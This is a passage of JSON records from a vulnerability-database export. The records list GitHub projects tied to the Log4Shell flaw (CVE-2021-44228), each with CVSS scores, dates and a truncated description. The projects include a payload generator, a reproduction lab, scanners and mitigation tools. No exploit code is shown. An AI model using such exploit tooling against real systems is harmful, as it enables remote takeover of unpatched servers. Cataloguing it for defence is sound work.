"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T10:44:22", "id": "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T11:15:49", "description": "# CVE-2021-44228 Spring Boot Test Service\nThis is a dirty hack s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T13:05:26", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-15T10:01:39", "id": "5B6C990F-05A3-5D83-83DF-386A34FB8560", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-19T17:12:44", "description": "# Log4Shell\u590d\u73b0\u73af\u5883\n\n## \u793a\u4f8b\u8bf4\u660e\n\n\u88ab\u653b\u51fb\u673aip\uff1a47.47.47.47\n\n\u653b\u51fb\u673aip\uff1a48.48.48.48\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T08:43:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-19T14:37:26", "id": "8D604793-908D-5C35-A3EF-6D2688A10312", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-03T00:06:11", "description": "# log4j-log4shell-affected\nLists of affected components and affe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T14:05:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-02T21:28:56", "id": "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "href": "", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:55", "description": "# aws-log4j-mitigations\n\nMitigations ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:01:55", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T08:05:42", "id": "126A30D2-0273-510B-B34A-DF7AE6E0C1C0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# yLog4j\n\nThis is Y-Sec's @PortSwigger Burp Plugin for the Log4j...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, 
"published": "2022-01-31T09:54:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-31T14:15:57", "id": "BFB49B3A-706B-5625-9899-54FCB1EE767B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T08:29:58", "description": "#### #1 \u4f7f\u7528\u8bf4\u660e\n\nCVE-2021-44228 log4j 2.x rce\u6f0f\u6d1e\u68c0\u6d4b\u5de5\u5177\uff0c\u5bf9\u76ee\u6807\u94fe\u63a5\u53d1\u8d77get\u8bf7\u6c42\u5e76\u5229\u7528...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T02:31:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T06:33:39", "id": "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T23:12:20", "description": "Log4JS File & Vulnerability Scanner + Local Port Bind Scanner\n\nT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T01:38:25", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:34", "id": "4FBD8560-2AEB-5AD2-9CA3-4A72DEDDE929", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:08:05", "description": "# Apache Log4j Zero Day aka Log4Shell aka CVE-2021-44228\n\n<!-- v...", "cvss3": {"exploitabilityScore": 3.9, 
"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:34:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:34:18", "id": "F4C136DE-892B-5921-8475-E30BD548DDBB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-15T18:01:48", "description": "# Log4j_Vulnerability_Demo\nA simple program to demonstrate how L...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T15:24:20", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T12:33:03", "id": "9326CB66-BADC-5643-B118-F38C39A9E34C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-29T19:04:19", "description": "# CVE-2021-44228 Remote Code Injection In Log4j\n\nhttps://twitter...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T05:23:44", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-29T14:47:24", "id": 
"473FFDA9-E615-53B6-9A81-F98A1ABD700E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T20:07:08", "description": "# log4shell-war-fixer\n\nLinux shell script that patches a WAR fil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T13:18:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T19:21:49", "id": "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:07", "description": "# log4j-win-quick\n\nDiscussed widely from December 2021. 
CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T00:45:48", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T00:52:01", "id": "48821FC8-9320-5568-88A3-9B2CC655ADAC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-19T02:42:16", "description": "# Log4j (log4shell) CVE-2021-44228 Public IOCs list\n\nPublic IOCs...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T18:52:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T23:50:50", "id": "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-28T02:09:47", "description": "# log4shell_scanner\nQuick and dirty scanner, hitting common port...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T19:36:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2021-12-27T19:40:45", "id": "31E7D7EA-2E1F-59D8-8BD7-81B8A4894F91", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-14T14:29:45", "description": "# log4j-payload-generator\nlog4j-paylaod generator : A generic pa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:02:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-14T08:54:54", "id": "E4103A50-881C-52BB-86CC-27F549B798E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:29:51", "description": "# CVE-2021-44228 Vuln App\n\n[\n\nMa...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:19:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-01T01:56:25", "id": "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-01T04:51:40", "description": "[ vulnerability scanner f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T22:11:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-19T01:59:07", "id": "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:15:08", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [Affecte...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T10:17:13", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-12T10:17:47", "id": "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T23:17:01", "description": "# log4j (log4shell) CVE-2021-44228 Public IoCs list\n\nPublic IoCs...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T14:54:45", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T22:43:20", "id": "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "href": "", "cvss": {"score": 9.3, "vector": 